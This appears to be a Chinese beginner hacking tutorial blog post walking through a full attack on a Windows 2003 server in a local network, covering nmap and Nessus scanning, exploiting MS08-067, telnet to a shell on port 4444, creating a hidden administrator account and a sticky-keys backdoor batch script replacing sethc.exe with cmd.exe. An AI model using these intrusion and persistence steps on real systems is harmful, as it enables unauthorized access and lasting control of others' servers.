小白客带你走进黑客世界5之一次完整的系统攻击行为

关注 2017-03-02 16:04:31 查看数 21383 ,评论数 0 黑客 专题 内网渗透 渗透测试
工欲善其事,必先利其器。在上一篇文章小白为大家介绍了黑客攻击过程中最用要的一环——踩点(信息收集)方面的两款漏洞扫描工具的安装过程和基本使用方式。今天,就让小白带领着大家进行一次完整的攻击过程。 再次回到我们一开始的文章小白介绍了黑客攻击行为的模型大致为:
踩点-->定位-->入侵-->留后门-->抹去痕迹
本次文章小白将要给大家来演示如何来攻破一台winows 2003 服务器,攻击的过程也将遵循上面的行为模型。 假设,在小白所在的局域网(ip:192.168.31.0/24)中,有一台windows 2003 的服务器,小白想要到服务器上面逛上一圈,但是很尴尬的是小白不知道这台服务器的ip地址,也并没有这台服务器的账号

踩点

第一步:使用过nmap对局域网进行扫描,扫描局域网中存在的计算机和对应的操作系统。

Nmap命令:
nmap –sn 网段 ->使用ping扫描局域网中存货的主机 nmap –O ip地址 ->识别单个ip地址的操作系统
3885162-e8a6f92040987c93 通过扫描主机存活我们可以看到,局域网中存在着5个ip地址。
192.168.31.1
192.168.31.2
192.168.31.133
192.168.31.254
192.168.31.132
通过简单的判断,192.168.31.1、192.168.31.2、192.168.31.132这三个地址是小白的电脑和网关的地址啦 ,可以直接排除。就只剩下192.168.31.133、192.168.31.254这两个地址了,接下来我们分别对这两个ip地址进行系统的识别。 3885162-21a86c1424025dee 通过对192.168.31.254的系统识别,它说这台计算机可能采用了特殊的操作系统,它无法识别,也有可能这个ip地址它不是一台计算机。接着,对192.168.31.133进行系统识别。 3885162-f8c3515f42eda410 果然,找到了服务器的ip地址,nmap的结果显示192.168.31.133这台计算机使用的正是windws 2003 操作系统。既然知道了ip地址,我们就可以进行漏洞扫描啦。

第二步:使用nessus对系统漏洞进行扫描

上一篇文章可能忘记说的一点就是nessus怎么打开了,在这里小白说一下。如果是在自己本地的计算机上面安装了nessus的话,就在火狐或者谷歌浏览器中输入地址:
https://localhost:8834
如果是在其他计算机上面安装的话,就在地址栏中输入:
https://ip地址:8834
那么,现在,我们就使用nessus开始对192.168.31.133这台服务器进行漏洞扫描。具体的使用方式可以查看小白的上一篇文章噢。 3885162-cc2a5eba85cd92fc3885162-dc0483b864188f4e 3885162-73e8183a8d7d7b65

分析

通过上图的扫描结果我们可以看出,该服务器存在漏洞编号为MS08-067的经典缓冲区溢出漏洞,我们可以通过该漏洞在服务器上面执行代码。 万能的度娘告诉我,这个漏洞是有直接的利用工具的,于是小白默默的收藏了一个。 3885162-2565e6c26b53bb23

入侵

第一步:下载ms08-067漏洞利用工具 3885162-18efe9f8dbf9a752 第二步:打开cmd窗口,将漏洞利用程序用鼠标拖进窗口 3885162-5086c3106e06f0c9 第三步:输入服务器的ip地址 192.168.31.133,回车进行攻击。 3885162-69bc83c5557e2a9d3885162-c8f5b2bf8b977fb7 这里小白猜想,既然是溢出漏洞,肯定和内存地址有关。有可能是win7的内存地址和windows2003的不同。 小白找了一台windows xp的计算机重新进行攻击。 3885162-9204a56b3e2e26ac 第四步:通过远程连接服务器(192.168.31.133)的4444端口,登陆服务器。
telnet 192.168.31.133 4444
3885162-9f4ffa8ec3e9fc83 3885162-218f80e8d0a37bb0 当然了,只是登陆它的命令行界面怎么能行呢?接下来,小白要做的就是利用命令创建一个管理员账号,光明正大的利用账号密码登陆。 第五步:创建管理员账号密码,并登陆服务器 我们通过登陆服务器的命令行界面来创建管理员账号密码。 命令:
net user 用户名 密码 /add
net localgroup administrators 用户名 /add
3885162-a9022a9212e598e5 这样,我们就创建了一个管理员账号啦。我们尝试通过远程桌面的方式登陆。 在本地计算机的运行窗口输入:mstsc,打开远程桌面连接窗口,输入服务器的地址 3885162-326dfae0aafddd6d 3885162-6b69c2e958b9b957 3885162-dbdbde7aa4f6ef25

留后门

既然已经入侵到服务了,怎么能不留给自己留下一个后门呢,方便下次进入。如果说我们这次创建的账号被管理员删掉了怎么办。接下来,小白就在服务器上面留下一个简单的shift后门。 第一步:编写shift后门脚本 点击开始-运行,输入命令:notepad,并回车会弹出来一个记事本。 在记事本里面写上以下代码:
echo 提权开始......
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
copy c:\windows\system32\dllcache\sethc.exe c:\windows\system32\sethc.exe
echo 提权结束......
保存,文件类型选择所有文件,文件名称为shift.bat 第二步:双击刚保存的bat脚本,创建shift后门,运行完成时候,尝试在服务器上面连续按五次shift键 3885162-7d09d87c3cabcfca 发现服务器弹出了一个命令行界面,这个界面还是可移植性系统权限的。接下来,我们把远程桌面关掉,再重新连接,然后不要输入账号密码,再一次连按五次shift键 3885162-07a79d8662c2d381 接着,尝试在这个未登录的命令行界面下创建另一个管理员账号。 3885162-1e54d8963eaa6836 我们使用dahuadan这个账号登陆,发现登陆成功 3885162-8f1c0ea77c0e7eee 这样即使管理员删除了我们偷偷创建的账号,也不怕不怕啦~ 就再创建一个呗~

抹去痕迹

暂不涉及(有需要的同学自行研究) 最重要的一点,不要搞坏事噢! 下一篇文章:小白客带你走进黑客世界6之搞崩你的计算机(蓝屏)  

*作者:_小白客,未经允许禁止转载

交流评论(0)
Loading...
点击 ,就能发表评论哦~如果您还没有账号,请 一个吧
css.php
正在加载中...